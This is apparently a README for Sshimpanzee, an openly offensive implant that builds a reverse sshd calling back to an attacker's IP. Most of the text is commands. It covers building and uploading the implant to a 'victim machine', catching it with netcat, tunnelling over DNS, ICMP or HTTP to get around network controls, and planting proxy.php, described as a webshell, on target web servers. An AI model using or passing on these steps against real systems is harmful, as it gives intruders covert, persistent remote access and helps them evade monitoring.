Sshimpanzee: reverse shell based on sshd supporting DNS and ICMP Tunneling

ICMP Tunneling

Sshimpanzee

Sshimpanzee allows you to build a static reverse ssh server. Instead of listening on a port and waiting for connections, the ssh server will initiate a reverse connection to the attacker’s ip, just like a regular reverse shell. Sshimpanzee allows you to take advantage of every feature of a regular ssh connection, like port forwards, dynamic socks proxies, or FTP servers.

More importantly, if a direct connection from the victim machine to the attacker server is not possible, it provides different tunneling mechanisms such as DNS Tunneling, ICMP Tunneling, or HTTP Encapsulation. It also supports HTTP and SOCKS5 proxies.

Usage

  1. Build the binary with -r to specify the remote address to connect to, here 192.168.0.2 port 8097.

./builder.py -r 192.168.0.2:8097

builder.py generates the sshd binary as well as a keys directory containing client and server ssh keys. The keys/CLIENT is the client private key. It is the one used to authenticate to the reverse sshd server. Only ed25519 key authentication is supported.

  1. Upload the sshd binary on the victim machine
  2. On your listening server, upload the private key
  3. Still, on server, run the standard ssh client with a netcat proxy command:

ssh anyrandomname@127.0.0.1 -oProxyCommand=”nc -lp 8097″ -i CLIENT

  1. On the victim machine run the binary:

./sshd

Alternatively, use -d option if you want debug information. Note that, in debug mode, sshd will not fork and will stay in the foreground.

./sshd -d

  1. 192.168.0.2 should have received the connection.

Tunnels

Currently, sshimpanzee support several ways for the implant to reach out to the attacker ssh client:

  • DNS Tunnelling using dns2tcp protocol
  • Through Proxy: HTTP/SOCKS4/SOCKS5
  • Sockets : (might be usefull if you want to implement your own tunnels)
  • ICMP tunnel
  • HTTP Encapsulation

The –tun argument is used to enable tunneling:

–tun tunnelname,tunneloption1=…,tunneloption2=…
–tun help

Use DNS Tunneling

  1. Build the binary

./builder.py –tun dns,dnsserv=<SERVER>

  1. On your server run the standard dns2tcpd using the config file in this repo, you will need to modify the domain (and resource port if you want).
    listen = 0.0.0.0
    
    port = 53
    user = nobody
    key = sshimpanzee
    chroot = /var/empty/dns2tcp/
    domain = <SERVER>
    resources = sshimpanzee:127.0.0.1:8080

     

     

     

sudo ./dns2tcpd -F -f dns2tcpdrc

  1. Run ssh on the client side as follow:

ssh anyrandomname@127.0.0.1 -oProxyCommand=”nc -lp 8080″ -i CLIENT

Use ICMP Tunneling

  1. Build the binary and icmptunnel server.

./builder.py –tun icmp,remote=<IP>,buildserv

  1. upload the build/icmptunnel binary on the server receiving the connection back

  2. Still, on your server, add the correct capabilities to avoid running the proxycommand as root and disable ping response from the system

    sudo setcap cap_net_raw+ep icmptunnel
    
    echo 1 | sudo dd of=/proc/sys/net/ipv4/icmp_echo_ignore_all

     

     

     

  3. Run the standard ssh client with icmptunnel as proxycommand:

ssh i -oProxyCommand=./icmptunnel -i test/CLIENT

Use HTTP Encapsulation (ssh -> http server -> sshd)

  1. Build the binary

./builder.py –tun http_enc

  1. Upload the file /tuns/http_enc/proxy.php and sshd files to your target web server

  2. Make sure proxy.php is correctly executed

  3. Run the sshd binary on the webserver

  4. run ssh on the client machine with a Python script in utils/scripts/ as proxy command: You can edit proxy_cli.py script to specify proxies.

ssh -o ProxyCommand=’python proxy_cli.py http://127.0.0.1:8080/proxy.php EncryptionKey 2>/dev/null’ a@a -i ../../keys/CLIENT

Side notes about http Encapsulation

  1. Proxy.php is a minimal webshell, you can use it to upload sshd to the server and run commands. proxy_cli.py offers –run and –drop options to do so.

  2. You might experience a huge input lag, it is because a delay of 1 to 5 seconds is added to the packet sent by the ssh client to prevent generating to many http requests. If you don’t mind generating a lot of http requests (thus a lot of logs on the web server) add the –no-buffer option to the proxy_cli.py command.

Using the sshimpanzee client

This repo also provides a client located in utils/client/bin. Simply copy the CLIENT key in utils/client/keys/

sshimpanzee --new PORT #create a new listener on PORT

sshimpanzee --new-dns #create a new DNS listener (Don't forget to modify utils/client/config/dnsconf.txt)
sshimpanzee --new-icmp #create a new icmp listener
sshimpanzee --new-http PROXY_PHP_URL #create a new HTTP Session

sshimpanzee --list #list availaible sessions

sshimpanzee --get SESSION_NUMBER #to jump into a session any extra parameters are passed as ssh params
sshimpanzee --rename SESSION_NUMBER #to rename a session
sshimpanzee --kill SESSION_NUMBER #to kill a session
sshimpanzee #use fzf to select which session you want

 

 

 

However, it might be less reliable than using ssh directly.

Install

Copyright (C) 2023 Titouan Lazard